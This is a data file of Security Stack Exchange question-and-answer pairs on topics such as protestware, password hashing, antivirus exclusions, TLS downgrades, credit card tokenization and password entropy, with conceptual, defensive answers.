source_id
int64
1
4.64M
question
stringlengths
0
28.4k
response
stringlengths
0
28.8k
metadata
dict
260,722
Since the beginning of the Ukraine-Russian war, a new kind of software was created, which is called "protestware". In the best case, the devs only add some (personal) statements about the war or uncensored information to the repositories or when starting the application. Since Github and other platforms are not banned in Russia, this could help to reach users and provide them with news. The open source initiative wrote in a blog post , that's ok to add a personal statement or add some commit messages with information about the war to reach users with uncensored information. But there are also projects which add malicious behavior. One example is the "node-ipc package", which deletes files depending on the geolocation. The affected versions also have their own CVE ( CVE-2022-23812 ) which was rated with a CVSS of 9.8. From a security perspective, it's best practice to install the latest version, which should fix security issues but not introduce new ones as a "feature". But the node-ipc module showed that each maintainer/developer can add bad behavior to the software as a political statement. Question: New software versions can be used as a political statement. As a user, should I be concerned about political messages in software? What should I do to mitigate malicious behavior? I can't review the code of all used libraries and applications. A lot of users do not have the knowledge to understand the code.
Political statements in software can be a concern for a few reasons: The may result in the software being banned in your country, so you should plan for that eventuality. They may result in the software being targeted (for example, the Notepad++ GitHub has been repeatedly spammed by Chinese accounts over its various version names ). And this may turn into more dangerous attacks which could compromise the software. It may indicate that the author is more likely to make actual changes to the software down the line. It suggests that the software is probably developed by an individual, which can make it more fragile and susceptible various issues. But if the software actively does something malicious, then it's not "protestware". It's just malware. So you should treat it the same as if the software decided to bundle a password stealer/cryptominer/ransomware/etc - using your existing supply chain and dependency management processes. The author(s) should also be blacklisted in your internal processes so that you don't use anything they have written (or anything that depends on them) again. It's also worth nothing that this isn't really anything to do with "open source". Adding political messages to software is just as easy with closed source projects, and adding malicious code is much easier , because it's harder to detect. Because of this, a lot of organisations are advising against using software from unfriendly countries (such as the FCC recently stating that Kaspersky is considered an "unacceptable risk to national security").
{ "source": [ "https://security.stackexchange.com/questions/260722", "https://security.stackexchange.com", "https://security.stackexchange.com/users/248862/" ] }
260,958
I am trying to better understand and determine the impact and implications of a web app where data tamping is possible. When discussing data tampering, I am referring to when you are able to use a tool such as BurpSuite or Tamper Data to intercept a request and modify the data and submit it successfully. I understand that this will allow an attacker to evade Client-side validations. For example, if the client does not allow certain symbols e.g. (!#[]) etc, an attack can input the correct details which the client will validate and then intercept the request and modify the data to include those symbols. But I'm thinking there is more than just the evasion of client-side validation that this vulnerability allows. I am also thinking it perhaps opens the door to allow Dictionary-attacks using BurpSuite or Brute-force logins to user accounts since data can be intercepted and modified which can be used to test username and password combinations. Would appreciate any insight regarding the implications of a Data Tampering vulnerability.
This "Data Tamper Vulnerability" is not a vulnerability. It's like "Door without lock vulnerability." Client-side validation is not validation. Is a convenience tool: better let the user know instantly that he cannot have # as username then waiting for the form to be submitted, the server reject the username and send back an error message stating that the username was not accepted AND he has to fill out the entire form again. If your threat model does not include "user submitting data without validation," you are doing it wrong. When an attacker sees your javascript stripping # from a field, one of the first things he will try is to send # on a field, and your server must deal with it. Do proper validation on the server. Never trust any data from the client: form fields, URL, GET parameters, cookies, JWT, filenames, everything coming from the client is untrusted until validated on the server . If the client is sending malicious input and the server is not validating, several bad things can happen: SQL Injection Remote Code Execution Cross Site Scripting Server side request forgery Remote file inclusion ... to name a few.
{ "source": [ "https://security.stackexchange.com/questions/260958", "https://security.stackexchange.com", "https://security.stackexchange.com/users/274318/" ] }
261,032
Is it possible to prove mathematically that a server is immune to denial-of-service attacks? Or is there some result in computer science journal that it this is an impossible task to do?
You cannot be immune to Resource Exhaustion It's fundamentally not possible. Every server or cluster of servers has a maximum amount of workload. If an attacker is capable of exceeding that, then you will not have enough to serve your intended customers and thus you have a Denial-of-Service attack. For the sake of clarity, "resource exhaustion" is one form of Denial-of-Service, but there are several more. For example, I could abuse a vulnerability in your code to crash your server repeatedly, lock all customer accounts, use shaped charges to breach the walls of the datacenter and then go wild on your servers with a shotgun, etc... All of these would result in "Denial-of-Service" in one form or another, but their mitigations are very different. My point is that you cannot mathematically prove to be immune from Resource Exhaustion, because no one can be immune. Nor can you provide proof to be immune from someone physically destroying your servers, etc... Provable security is possible - to a degree Provable Security refers to some form of mathematical proof, which ensures that a certain product ensures it will do what it claims to do. The seL4 microkernel, for example, has some proof that some functions do what they claim to do (although that doesn't mean it is impossible that the hardware used to run it has no vulnerabilities). However, trying to prove that a microkernel does something and trying to prove than an application does something are two vastly different tasks, because an application depends on so many layers below, that it becomes functionally impossible.
{ "source": [ "https://security.stackexchange.com/questions/261032", "https://security.stackexchange.com", "https://security.stackexchange.com/users/276681/" ] }
261,064
If the password is hashed and then sent to the server where the hash is compared to the stored hash, this basically means that if someone had that hash they can still log in by sending the hash in the request, the password is just useless at this point. I am talking with respect to Bitwarden. How does hashing a password make it more "secure"?
If the password is hashed [locally] and then sent to the server where the hash is compared to the stored hash ... I am talking with respect to bitwarden This is not how it is done. From Bitwarden help : Bitwarden salts and hashes your master password with your email address locally, before transmission to our servers. Once a Bitwarden server receives the hashed password, it is salted again with a cryptographically secure random value, hashed again , and stored in our database. So basically the locally hashed password is treated as the server visible secret and this is properly protected with server side hashing. The point of local hashing is that the password that the user can remember is never transmitted, i.e. it is an additional security measure. While it is true that the resulting hash would be usable by an attacker instead of the original password, it is much harder to guess the long and kind of random hash than the way more weak password. And brute forcing this original user password is also made harder due to a deliberately slow hash function. What Bitwarden does here to harden a weak password is also known as Key stretching .
{ "source": [ "https://security.stackexchange.com/questions/261064", "https://security.stackexchange.com", "https://security.stackexchange.com/users/252088/" ] }
261,088
I'm curious what is the most widespread way nowadays to sign the telemetry message from a software program to prove its authenticity to the receiver? Imagine the software (which can run on-premise, at customers PC) creates a telemetry record. With the customer's consent this record is send to the vendor server. The customer is aware of the message content (due to the legal reasons) and knows to which API it is send (because everybody can use traffic sniffers). How the vendor can be sure that the telemetry message is genuine, originating from their software? The goal is to reduce the risk of malicious manipulation of the telemetry message. The first that come into the mind is embed the secret key to the software, use it to sign the telemetry message. The receiver checks the signature using the private key and discard the message if the signature is not valid. To achieve that the software assembly line must provide fresh private key at least for each release of the software, so the signing key remains fresh. The apparent risk is leakage of the signing key. Since it will be embedded in every copy of the software and the software is shipped to the customer, there is no guaranty that it stays secret. The risk of the key leakage can be reduced by the short key validity time. But it can not be shorter then the valid usage time of the software version itself (1-2 years). So the risk of key leakage remains. Is this a working approach? Are there are any other disadvantages of suggested scheme, which I don't see at the first place?
If the password is hashed [locally] and then sent to the server where the hash is compared to the stored hash ... I am talking with respect to bitwarden This is not how it is done. From Bitwarden help : Bitwarden salts and hashes your master password with your email address locally, before transmission to our servers. Once a Bitwarden server receives the hashed password, it is salted again with a cryptographically secure random value, hashed again , and stored in our database. So basically the locally hashed password is treated as the server visible secret and this is properly protected with server side hashing. The point of local hashing is that the password that the user can remember is never transmitted, i.e. it is an additional security measure. While it is true that the resulting hash would be usable by an attacker instead of the original password, it is much harder to guess the long and kind of random hash than the way more weak password. And brute forcing this original user password is also made harder due to a deliberately slow hash function. What Bitwarden does here to harden a weak password is also known as Key stretching .
{ "source": [ "https://security.stackexchange.com/questions/261088", "https://security.stackexchange.com", "https://security.stackexchange.com/users/163171/" ] }
261,119
I am implementing a system where I need to store passwords in a database (hashed and all). My issue is that the business side requires me to not enforce any constraint on them except length (8 characters minimum), but highly advise to use special characters, uppercase characters or not use your first name. Not following these advises would have liability implications on our side. For example, we would allow a client to use 12345678 as a password, but would not be liable if it gets brute forced. This would require me to have an integer in my database that remembers this for the original password (pre-hashing). Any big no-no in doing this ? EDIT: Just to clarify, the integer would most-likely be a flag that represent the type of weakness, ie: too simple, commonly known weak password, uses personal information, etc.. EDIT 2: Current solution based on the multiple answers and comments below would be to store an integer with flags that have been bit shifted. This integer would be stored in a separate database and encrypted using public-key cryptography, most likely using ECC. EDIT 3: This is only viable assuming basic security at lower levels (OS and network) as well as spam prevention. The system would block further attempts for sometimes after multiple failed attempts, password are securely hashed using both a (at least) 128 bits salt and time/memory consuming algorithm (Argon2id in this case). Final Edit: I have set @steffen-ullrich response as accepted. Lots of very good answers and I appreciate all the reason why I shouldn't do this but I wanted answers on what could go wrong and how one would go about doing it this way (many responses helped form the last edit). The legal aspect was provided to focus on the technical standpoint in light of a requirement I have no control over. My second edit basically describe what implementation would be a 0 compromise way of doing this. Disclaimer: this is pure curiosity and I have no plans to actually deploy this in production for the time being, I would recommend reading comments and chat threads before attempting this as they describe much of the problems and limitations of an approach like this.
Password hashing (with salting and slowness) is designed to make it indistinguishable from just having the hash if a password is weak or strong. Adding an additional indicator about the quality of the password allows an attacker to focus on the weak passwords and therefore significantly decreases the costs for an attacker.
{ "source": [ "https://security.stackexchange.com/questions/261119", "https://security.stackexchange.com", "https://security.stackexchange.com/users/249756/" ] }
261,310
I own a small coffee shop in a highly-populated area. We've noticed that several computers are connecting to our WiFi network using spoofed MAC addresses (e.g. 11:22:33:44:55:66). Is there any way of identifying these machines? Is there any way to determine who these users are? I've been manually blocking these MAC addresses but they just create new addresses. Why do we block them? Because we've been notified by our ISP that these devices are using our WiFi to perform nmap scans. They aren't just "browsing", they're using our account to find open ports on machines all over the net.
Detecting and blocking spoofed MAC addresses is a losing game. As Toni pointed out, the attackers could just start copying MAC addresses of real devices so you would have no practical way to stop them. In fact, it would just lead to denial of service for some of your legitimate customers. Instead, you could configure a firewall on the router to block outgoing connections to all ports except port 53 (DNS), 80 (HTTP) and 443 (HTTPS)*. This way, most of your regular customers will be able to continue browsing normally, and your wifi will be useless for people attempting nmap scans. *You might also want to allow common VPN ports , since a lot of people tend to use a VPN on public WiFis. Of course, this means people will be able to conduct nmap scans from your WiFi over VPN, but in that case, it should be the VPN providers headache.
{ "source": [ "https://security.stackexchange.com/questions/261310", "https://security.stackexchange.com", "https://security.stackexchange.com/users/277103/" ] }
261,324
Suppose a hacker creates a Windows application that looks and feels like a legitimate web browser. The user believes they are using, say, Google Chrome. If you simply watched the bits going to and from the computer over the network, it would look like the user in fact was using a legitimate browser like Google Chrome. However, on the client side, this fake browser records all keystrokes entered by the user, and from that data, deduces the user's website/password-manager passwords. In the background, this data is continuously transmitted to the hacker. Alternatively, this fake browser could act like a legitimate browser for all URL's entered by the user except for some specific exceptions. Perhaps for a banking URL like chase.com, the browser does a phony DNS-resolution and serves up content from a different site owned by the hacker, fooling the user into entering login credentials or other sensitive info. Are attacks like these possible? If not, what mechanisms are in place to thwart such attempts? I tried googling for phrases like "fake browser hack" but have not found anything that seems to resemble this.
Are attacks like these possible? Yes. A hacker just needs to download the Firefox source code, recompile it, and distribute it. If not, what mechanisms are in place to thwart such attempts? A user could download browsers from their official sites, not third party sites. They could also use package managers or app stores that are associated with many operating systems.
{ "source": [ "https://security.stackexchange.com/questions/261324", "https://security.stackexchange.com", "https://security.stackexchange.com/users/277119/" ] }
261,720
Looking to create a form where developers can submit requests for packages to be installed. We want to create a list of questions that can help us determine whether or not a package is safe. What are some important questions to include in the form for our developers? My list so far: Package Type: NPM, PYPI, etc... Package Name: Package Version: Package Release Date: Explain Use Case of the package: Provide the Package Documentation Commit history? Actively maintained and updated? How many people can make commit changes? Are changes automatically approved or are they reviewed? Are there open Bug Reports? How many? How long have they been open? Any active or previous vulnerabilities listed in NVD? https://nvd.nist.gov/vuln/search?results_type=overview&query=Cloudinary&search_type=all&form_type=Basic&isCpeNameSearch=false What dependencies does this package require.
I highly doubt that a process to request approvals for new third-party packages will have the desired effects. I've worked for organizations that have tried to introduce similar processes, and they tend to fail. The approval process rarely fits into the speed and cadence of development, leading to problems like teams not being able to execute on their planned work or bypassing the review process entirely and dropping key aspects of third-party package review and selection. Especially in agile organizations, when the need or possibility for pulling in a third-party package as a solution arises, the team usually doesn't have a lot of time to make a decision. The work is already in progress and they need a rapid decision to begin to move forward to design, build, and integrate solutions. The first step is to give the team the knowledge needed to select appropriate packages, considering things like license terms and the overall health of the different options. The health of the package may consider any number of factors, but some that I've seen are things like how responsive the developer is to questions/issues in official support channels, how active the user community is (including third-party channels like Stack Overflow or various forums), the number of open issues and/or time to resolve defects, number of open pull requests, age of pull request, number of committers and who the committers are, frequency of commits, frequency of releases, number of times the package is a dependency, number of downloads (per unit of time, in some cases), number of dependencies, and documentation (readme, contributor documents, funding information). Unfortunately, no one but you can determine what factors are most important. A big factor are the risks associated with the system that you are developing, along with the tolerance for risk for the developing organization as well as the users and customers. Some contexts are very sensitive to risks, while others are very tolerant. Snyk and Synopsys have tools that track common open source components and make some health information public. Their ratings and criteria may not be totally appropriate for your organization and you may need to add guidance on how to interpret their data or what to do when components are not in their databases, but this may give you a good starting point to make things easier for the teams looking to include open source components. Giving the developers doing the work the training and the tools needed to compare options and make informed decisions based on guidelines is important. Taking these tactical decisions away from the team will only slow down the development effort and leave the teams unempowered to make the best design decisions. Once a package is incorporated, there's also ongoing maintenance. The use of software composition analysis tools can scan your software, find dependencies, and monitor those dependencies. You can be alerted to things like new versions, new vulnerabilities, or packages that no longer appear to be maintained. When these alerts come through, the development team can triage them to apply patches (or other mitigations), defer patches for a later time (if the vulnerability is low risk or there are other mitigations already in place), or identify when it may be time to migrate away from one dependency to another solution. Depending on your threat model, you may also need to consider other ways to mitigate risks. Even with the appropriate reviews, there are cases of developers yanking their packages from the Internet, purposefully injecting malicious code in new versions, or not adhering to standard versioning schemes and breaking dependent systems. Versioning pinning, standing up mirrors for your dependencies, or building your dependencies from source may mitigate further risks. For open source dependencies, you may also be able to scan the source with your internal vulnerability scanners to further mitigate risks of malicious code.
{ "source": [ "https://security.stackexchange.com/questions/261720", "https://security.stackexchange.com", "https://security.stackexchange.com/users/277711/" ] }
261,753
I am reading "Serious cryptography" and he wrote the following: Informational security is based not on how hard it is to break a cipher, but whether it’s conceivable to break it at all. A cipher is informationally secure only if, even given unlimited computation time and memory, it cannot be broken. Even if a successful attack on a cipher would take trillions of years, such a cipher is informationally insecure. Then, he proceeded to write that the one-time pad is informationally secure. I don't understand this at all. If we see a cyphertext, such as 00110 , we know that the corresponding plaintext has 5 bits as well, and the cypher key will also have 5 bits, thus 2^5*2^5=1024 possible combinations. Bruteforcing 1024 will yield a result. Even if the cyphertext is huge and bruteforcing won't be practical, it is still theoretical possible, no? If it is theoretical possible, wouldn't it deem the one-time pad as informationally insecure? What am I missing here?
Bruteforcing all 1024 possibilities will yield a result. Yes, a result. But even if you iterate all 32 5-bit combinations, you still have no idea which one the "correct" one is. That's what makes it informationally secure: Even if you iterate every key (and thus, every possible message), you don't know which of these messages is the one that was sent. For example, imagine the following message: ATTACK AT 8 It's 11 characters long, and you could conceivably iterate the space of all 11-character strings. This will yield results such as: PIZZA TIME! YOZNACKS :) ATTACK AT 3 ATTACK AT 8 IN UR BASE! Now you look at all these messages and you still are none the wiser. In fact, you don't even need the ciphertext at all. Knowing the length of the message, you can simply iterate the entire message-space and all you will know for sure is that one of these messages must be the correct one. To break it down even further, imagine your message is just a single bit, either 1 or 0 . To encrypt it, you either decide to "flip" it or not (meaning, you XOR it with 1 or 0 ). This leaves us with the following 4 states: Message 0 , Key 0 => Ciphertext 0 Message 0 , Key 1 => Ciphertext 1 Message 1 , Key 0 => Ciphertext 1 Message 1 , Key 1 => Ciphertext 0 You then present the ciphertext to the attacker, while keeping the key secret. Say, you present 1 . According to the table, the message was either 0 with a key of 1 , or the message was 1 with a key of 0 . But since the attacker does not know the key, they only have a 50% chance of guessing the correct bit - which is the best they can do in a perfect system. For every bit in the message, the chance of successfully guessing the message is divided by half. And again, you can only guess the message - there is no indication whether your guess is correct or not.
{ "source": [ "https://security.stackexchange.com/questions/261753", "https://security.stackexchange.com", "https://security.stackexchange.com/users/277751/" ] }
261,890
A user is trying to access a poorly maintained website using a modern OS (Windows 10) and web browser (Firefox 100.0). They want to download something from there, but they are seeing a security warning indicating that the host is using a deprecated TLS protocol version and/or has an issue with its certificate. The user been in touch with the person who owns the domain and downloadable content, and this person is being slow to get it fixed. Questions: Can the user (re-)enable old TLS protocol versions for this site in Firefox ( security.tls.version.enable-deprecated = FALSE ), and safely browse & download content as long as they avoid entering data such as credit card numbers, passwords, etc.? Or does simply browsing a site using old TLS versions itself carry inherent risks? If the latter, is there a way for them to reasonably mitigate these risks? (By reasonable, I mean without configuring network/firewall settings, using a container, etc.) They are considering firing up an old Windows XP computer running an also-old Internet Explorer, which I'm open to letting them do, as long as they don't share their data on the network and take the device offline as soon as they are done. LMK if you can think of any reasons why this would be a bad idea. I looked for answers on Firefox forums, this forum, and via a general web search, but I didn't find anything useful.
Of course the site should upgrade its TLS setup. But, until the site owner does that, the user that needs to download the file from the site must look for a workaround. The user can proceed to download the file - either by using http instead of https if the site allows it, or ignoring the browser's TLS / certificate warnings and proceeding anyway, or by using an older operating system from the same vintage as the site's TLS setup, or by using a command line tool such as curl or wget , or another method. But, as others have mentioned, a man in the middle (MITM) would be in a position to impersonate the site, and serve the user a malicious file instead of the true and correct file . To mitigate this problem, the user would be well advised to verify the integrity of the file, by taking a checksum hash of the file after downloading it, and ensuring that it matches the known correct checksum for the file. Related: Are downloads from http connections safe? ubuntu sources.list urls are not HTTPS -- what risk does this present, if any?
{ "source": [ "https://security.stackexchange.com/questions/261890", "https://security.stackexchange.com", "https://security.stackexchange.com/users/213485/" ] }
262,061
Suppose we have a site that has public and private areas. The private areas require login. For example "www.site.com/about" is publicly accessible. But "www.site.com/message_inbox" requires authorization (valid login). So what happens when someone who is not logged in, tries to access a private area like "www.site.com/message_inbox" ? It would be terribly confusing for legitimate users to receive a 404 error. (e.g. imagine refreshing the page after your session expires and seeing a 404). Therefore, it is convenient for legitimate users if we redirect to a login page. However, then an attacker could determine whether "www.site.com/some_page" is a legitimate private URL, by seeing if it returns a 404 error or a login page. Maybe we don't want outsiders to be able to compile a list of valid URLs. We could attempt to mask this by redirecting ALL requests to the login page, except for the public pages. But this becomes silly as all junk requests will happily return HTML. What is the correct solution to this?
What is your threat model? With a blanket approach you won't solve your use case. Correct, if you do as you describe you allow an attacker to enumerate your valid pages, theoretically. Does he have an advantage doing so? Do you have a possible attack vector that requires him to have knowledge of valid pages? Would your app leak information through such an enumeration? These are the questions to ask. Once you have the answers, you can calculate the trade-off between user-friendliness and security. Maybe we don't want outsiders to be able to compile a list of valid URLs. The question "why?" is asked not often enough in InfoSec. We have a bunch of "best practices", most of which are really based on "everyone I asked thinks that's a good idea". Take the password complexity disaster where we've told users for decades something that's simply wrong. And it'll take us at least another decade to get all those silly complexity rules encoded into software and security policies out of the system. Never stop with "maybe we don't want". Ask what the actual threat behind it is that you are trying to prevent.
{ "source": [ "https://security.stackexchange.com/questions/262061", "https://security.stackexchange.com", "https://security.stackexchange.com/users/277680/" ] }
262,112
A company are saying they sent an email to me. I have gone through all of my inbox, junk, and deleted files and the email still doesn’t exist. They have asked me to prove the email never got to me by asking my email provider to send over log details but I have looked into this and it is impossible. Is there any other way to prove an email wasn’t sent to me? Also I have asked them to resend the email but they are saying because the email was automatically generated from an email sent to them they don’t have a copy of the sent email.
This is one of those situations where Amazon is asking someone to send a picture proving that a package was never delivered. You can't. In general, you cannot "prove a negative". Trying to get your email provider to supply logs will be difficult and might take a long time. And they might not do it. What will be a lot easier and faster is for the company to check their own email logs for proof that they sent the email. They don't need a copy, just a log entry.
{ "source": [ "https://security.stackexchange.com/questions/262112", "https://security.stackexchange.com", "https://security.stackexchange.com/users/278342/" ] }
262,274
I need to validate and store credit card information (name, card number, expiration date, CVC) for retrieval at a later date. Once retrieved, the data will be used for manual processing on a separate system. I have been told countless times that storing credit card data in a MySQL database is a terrible idea, even if encrypted in PCI compliant secure servers. What service in 2022 can I use that has something like an API, and with which I can securely store and retrieve credit card info? Validating it before storing it would be awesome, but I can do that in an extra step if necessary.
What service in 2022 can I use that has like an API in which I can securely store credit card info and retrieve it at a later date for manual processing? Pick a credit card processor, any credit card processor... They will have a service named "Tokenization" where: You give them the credit card details They give you a "token" back All future use of that card is done by sending them the token The advantage of this is that all the work of properly encrypting the card info falls upon them, all you have to do is store those tokens and use them in lieu of the card details. If you decide you want all those numbers back, you can request detokenization, for some reasonable fee. But it's better just to leverage the tokens; detokenization is usually triggered by a merchant switching to a different processor.
{ "source": [ "https://security.stackexchange.com/questions/262274", "https://security.stackexchange.com", "https://security.stackexchange.com/users/277795/" ] }
262,453
A technical problem has arisen, and the vendor's first suggested solution is to exclude the program's folders from our antivirus. There are multiple reasons I am hesitant to do so: Primarily: If a malicious file finds its way into those folders, either via vendor patching or unrelated actions, said file will be ignored by the antivirus whereas it may otherwise have been immediately neutralized. We currently only exclude specific files by their SHA256 hash. This program set, however, contains far too many files for this to be feasible. This can not be scalable. If we excluded every folder for every approved application, the threat surface would be colossal. And so forth. In this specific instance, it's something we can do for a specific set of machines to test. The situation did bring forth the general question, however I'm curious to know what the larger community thinks about when is it acceptable to exclude folders in antivirus , and why ? The short answer, I would argue, is "as little as possible" for the reasons I listed above and more, but I came to realize that I can't think of a single scenario where it would be a good idea. The functionality is common in antivirus applications, which suggests that there are legitimate reasons to do so, but I can't think of an instance where we would want to leave an entire folder free to become infected. I struggle to put this into precise words, but it feels like violating some analogue to the least-trust principle -- it'd be a lot smoother day-to-day to give all employees full admin access to everything, until it goes horribly wrong; similarly, it'd be really easy to just exclude folders from antivirus at the first sign of false positive, until that backfires when there really is something malicious in there. Are there examples I'm not thinking of where it really is the best solution, where this would be the advisable choice? Example scenarios and research are welcome.
Ah yes, ye olde problem of security tools making a system unusable. My arch nemesis. when is it acceptable to exclude folders in antivirus, and why? Short answer: There's an old adage on this site that "Security at the expense of usability comes at the expense of security" -- ie if your security controls make a system unusable, then people will find cheeky ways around your controls (like CTRL+ALT+DEL killing the anti-virus agent, or doing their work on a machine that does not have the AV installed), often resulting in bigger security holes than what you were trying to prevent in the first place. Not to mention that an entire company's worth of lost productivity due to fighting with sec tools can add up to be as expensive as the breach they're trying to prevent. Remember that the goal of infosec is to add value to the company's bottom line; if you hurt productivity too much then you're actually doing tho opposite. Dialing back security tools so that people can actually get their jobs done is often necessary. Examine your options, do some trials with a few volunteers, and then re-engage the tool in a less disruptive way. Longer answer: Primarily: If a malicious file finds its way into those folders, either via vendor patching or unrelated actions, said file will be ignored by the antivirus whereas it may otherwise have been immediately neutralized. And of course if it becomes known that this folder is excluded, then malicious files may intentionally find their way there! We currently only exclude specific files by their SHA256 hash. This program set, however, contains far too many files for this to be feasible. This can not be scalable. If we excluded every folder for every approved application, the threat surface would be colossal. Some options to consider: If those application folders are super locked down (like read-only by local accounts, writable only by some domain super user account), and you AV those applications before deploying them, then maybe excluding the whole folders is reasonable. Many AVs now support code-signing-based allow lists. So for example at the time that you approve Firefox, you could add Mozilla's code signing cert to your allow list. This approach has drawbacks because not all vendors code-sign, and just because you trust one app from a given vendor, you may not want to trust everything they produce. Keep an in-house code-signing CA to sign files that you want the AV to ignore. That way the AV's allow list consists only of your in-house CA. This still has the drawback that you can only codesign binaries, so if the AV is causing problems with config and data files then this won't help.
{ "source": [ "https://security.stackexchange.com/questions/262453", "https://security.stackexchange.com", "https://security.stackexchange.com/users/256638/" ] }
262,634
Sometimes I receive email messages from organisations I'm involved with saying something like: Alice at AnyCo has sent you a secure message Along with a link to access said message. Sometimes I'm then asked to create an account. The last one even decided to use "2FA" and send me a code to the same email address before I could log in. The companies which provide this service (for example Kiteworks ) seem to act like it's the responsible way to send documents. My impression is that this amounts to "security theatre" and does nothing to prevent unauthorised access to the file by third parties, or tampering with the contents of the file, compared with simply sending an attachment. That is usually what is implied by these services.
It provides some benefits in that the sensitive contents are stored on the server, rather than in the body of the email. This means that the link can be revoked to block access (for example, if the email was sent to the incorrect address) - whereas once an email has been sent, there's no reliable way to recall it. It also allows the file sharing platform to implement some additional security controls (such as IP restrictions, or only allowing federate authentication) - so the link by itself might not have any value if an attacker can't reach or authenticate on the site. But in a lot of cases, it is just security theatre (especially if the "secure" platform doesn't enforce conditional access, MFA, risky login detection, and all the other security features that the email system does). It also trains users to click links in emails and then enter their credentials, which is obviously a very bad habit to get into. A lot of the time, these "secure" platforms are used for compliance reasons, rather than because they're addressing a realistic threat.
{ "source": [ "https://security.stackexchange.com/questions/262634", "https://security.stackexchange.com", "https://security.stackexchange.com/users/34123/" ] }
263,429
Context: I'm filling my taxes and my country requires me to upload certain documents from my employer to verify the numbers I give to the government. These documents are "digitally signed", like so: Now, before I use these certificates, I'm required to "validate" these signatures so that the sign above becomes a green tick mark: One process to do this is outlined in this government document . I've discovered that if I email this PDF and download it on a different computer, the validation (the Green Tick mark) disappears, and I'm back to how it was before validation. This makes me believe that validation is a local exercise -- it only tells if the current PC I'm on "trusts" this digital signature. I've also found that this validation only appears on Adobe Reader. If I open it up on a Browser (even from the same PC), it disappears. My questions: Is my assumption that validating a digital signature through this method is "local"? If that's right. what's the point of validating a digital signature when, if, when someone else opens it on their PC, it's going to appear like it's not valid (without the green check mark) anyway?
One process to do this is outlined in this government document. This document basically instructs you to trust the issuer of this signature on the local machine by importing the issuers certificate in the document into the local trust store. It is local only, i.e. it only makes changes to the local machine and not the document itself and thus these steps need to be retaken on any other machine were the signature should be checked. If these instructions are all what you get, then I find this very questionable. The point of validating a document signature is to check that the document is issued by the expected person - so there need to be some expectation already. Since you don't know the issuer and signer of the document personally there is usually some trust chain involved to get to this expectation, i.e. you don't know the person directly but you trust the government (in this case) and the government cryptographically tells you that they trust this person (as government employee). See chain of trust for a deeper explanation of this concept. What you are asked to do in the instructions is different though. There is no mentioning of a trust chain (even if there is one shown on page 3) but instead you are expected to simply trust the person because the instructions tell you to trust them. Blindly following these instructions will also make you trust non-government persons, i.e. potential scammers. Adobe even kind of warns you against doing thus, but unfortunately only in a technical terminology useless for most users (page 4): Additionally these instructs ask you to grant very broad permissions, specifically to make the certificate associated with the document a trusted root. I'm pretty sure that this is not needed and could in fact be harmful. In fact, it specifically says that in this case it will not be checked if the certificate gets revoked, which might happen if the government removes the trust from this employees certificate (like certificate compromised, employee left, ...). Unfortunately again only in technical terms (page 5): In other words, these instructions are not intended to actually provide security. They are only intended to somehow show the green tick mark. My hope is that the person who ultimately needs to get these documents will do some proper checking, your task here is basically only to weed out early problems before uploading.
{ "source": [ "https://security.stackexchange.com/questions/263429", "https://security.stackexchange.com", "https://security.stackexchange.com/users/180681/" ] }
263,531
This likely stems from my complete lack of familiarity with encryption technology and IT security in general, however it isn't clear to me how biometric authentication (such as Apple's TouchID) makes the data it protects more secure than a simple password. It's clear to me that, individually , biometric authentication is more secure than a memorable passcode. A fingerprint, face or voice can't really be "guessed", for example, in the same way a password can, and is characterized by something like thousands or millions of datapoints. However, biometric authentication systems such as TouchID often only complement a simple passcode. If, for whatever reason, I'm unable to unlock my iPhone with my face or thumb, I can still unlock it with a 4-digit passcode. Since e.g. TouchID only adds another way to unlock e.g. an iPhone, isn't the protected data in principle easier to "hack" (and, in practice, something like just as difficult)? There are now two "entryways".
The main reason for Apple to introduce TouchID was to make people use more complex passwords. For the sake of quick and easy access to their phones, people often used very simple passwords or no passwords at all, because they found it impractical to type in long passwords. With TouchID, it became possible to use long and thus more secure passwords, while still being able to quickly and easily access the phone with just a finger‘s touch. So, while TouchID does not add security by itself, its practical use allows to improve the security of the existing protection method.
{ "source": [ "https://security.stackexchange.com/questions/263531", "https://security.stackexchange.com", "https://security.stackexchange.com/users/280734/" ] }
263,564
I got an Email (to my iCloud address) from Disney+. The email contained a subscriber agreement. I did not register for their service myself. On the Disney+ website I saw that there was indeed an account for my email address. Using "forget password" I was able to log into the account and change the password. I contacted Disney support, asking them to delete the account. However, they said that they can not delete the account since there is a running subscription via iCloud. This subscription has to be cancelled in order for the account to be deleted. At this point I was very concerned that someone has hacked into my iCloud (which runs under email address used for the Disney+ account). So I logged into my iCloud and checked the running subscriptions and active devices but there was no suspicious activity at all and no Disney+ subscription listed. My questions are: is it technically possible that the Disney+ Account is connected to my email-address but using a different (unknown) iCloud account for the subscription? are there any security concerns for me or have I just randomly be given a free Disney+ account (by someone else's mistake)?
Yes , it's possible to use your email address and pay via credit card, PayPal, subscription cards or the respective mobile providers (Apple / Google Pay) . It does not have to be a payment with Apple Pay / your iCloud account . As you are able to login, you should see the used payment method in the account's "billing details". I do not see any further security concerns on your side . You already checked for an intrusion into your iCloud account and there seems to be none, which is good. You contacted Disney and they did not care (which is questionable). I'd say whoever created this account is going to realize he is no longer able to login and therefore going to cancel the payment subscription sooner or later. Lesson learned for the person who created the account with a random email address. You probably get a notification email after the subscription has ended, then you are able to delete the account.
{ "source": [ "https://security.stackexchange.com/questions/263564", "https://security.stackexchange.com", "https://security.stackexchange.com/users/280772/" ] }
263,582
I am setting up a postgres db that will never be used by humans. In fact, I really don't need to know it myself ever. I assumed that just using a 256bit(64 alphanumeric chars) hash of a unix timestamp IE: date +%s%3N | sha256sum A very important detail is I am not "hashing a password"... I am hashing a timestamp and using the sha256 hash as the password in the db connection string. would be pretty damn strong. An example of one I could use has 31 lowercase chars and 33 integers, for an entropy of ~330 bits, which is.... well... I'd say pretty damn solid, if not completely insanely overkill. The reason I ask is because it STILL got flagged by chainlink's password complexity check for only having lowercase chars and numbers. So... My question is, are they right? Is there something wrong with a 64 character alphanumeric password just because it doesn't have fancy capital letters? Is there something inherently wrong with using sha256 algo with a timestamp like this? I am contemplating raising an issue on their github stating that I should not have to set their SKIP_DATABASE_PASSWORD_COMPLEXITY_CHECK=true flag for such a password, and that they should consider the actual entropy of the password instead of just applying a set of simple rules.
... for an entropy of ~330 bits, ... The question is not how strong a password looks like but how strong it actually is. SHA-256 does not add any entropy at all, so it all depends on what the input to SHA-256 was. And the entropy of the chosen input is pretty low: Assuming that the attacker knows how the password was created, they can test all possible inputs around the time the password might have been created. A much stronger input would be to use real random data as input: dd if=/dev/random bs=1 count=32 | sha256sum While the output might look similar strong, it is practically impossible to predict the input by the attacker.
